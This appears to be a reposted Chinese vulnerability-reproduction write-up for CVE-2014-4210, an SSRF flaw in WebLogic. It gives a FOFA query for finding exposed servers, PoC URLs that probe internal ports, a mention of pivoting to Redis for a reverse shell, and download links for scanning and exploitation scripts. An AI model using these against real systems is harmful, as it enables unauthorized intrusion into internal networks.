漏洞环境
FOFA搜app="Weblogic_interface_7001"
影响范围
10.0.2.0, 10.3.6.0
漏洞危害
探测内网存活的ip和端口,探测内网系统中存在的文件,如果内网有IP开启redis服务,我们就可以用存在ssrf的服务器给含有redis服务的服务器发送命令,然后反弹shell,有些ssrf还可以利用file协议对目标机本地的文件进行读取。
漏洞复现
访问
http://1.1.1.1:8001/uddiexplorer/SearchPublicRegistries.jsp
探测此ip存在的内网ip段
poc
探测此ip存活端口
http://1.1.1.1:8001/uddiexplorer/SearchPublicRegistries.jsp?rdoSearch=name&txtSearchname=sdf&txtSearchkey=&txtSearchfor=&selfor=Business+location&btnSubmit=Search&operator=http://127.0.0.1:8001
此返回状态说明8001端口是开放的
http://1.1.1.1:8001/uddiexplorer/SearchPublicRegistries.jsp?rdoSearch=name&txtSearchname=sdf&txtSearchkey=&txtSearchfor=&selfor=Business+location&btnSubmit=Search&operator=http://127.0.0.1:7001
此返回状态说明7001端口是关闭的
批量检测脚本
链接:https://pan.baidu.com/s/1OUcKcm-wBONMoC20AysCEw
提取码:9slm
下载脚本成功后,同目录下新建文件domain.txt内容格式如下,然后运行脚本即可
利用脚本
链接:https://pan.baidu.com/s/1K5zRzD2AtWIvIicTGUhJ4Q
提取码:9trc
下载完脚本之后有两处需要修改的地方
第一处:url改为你发现存在SSRF的url
第二处:ip地址这个是探测内网一个网段的可从上面信息搜集得到的ip段信息进行修改
另外如果要修改想要探测的端口直接在脚本里面修改即可
原文始发于微信公众号(赛瑞攻防实验室):CVE-2014-4210 Weblogic SSRF漏洞复现
免责声明:文章中涉及的程序(方法)可能带有攻击性,仅供安全研究与教学之用,读者将其信息做其他用途,由读者承担全部法律及连带责任,本站不承担任何法律及连带责任;如有问题可邮件联系(建议使用企业邮箱或有效邮箱,避免邮件被拦截,联系方式见首页),望知悉。
- 左青龙
- 微信扫一扫
-
- 右白虎
- 微信扫一扫
-
评论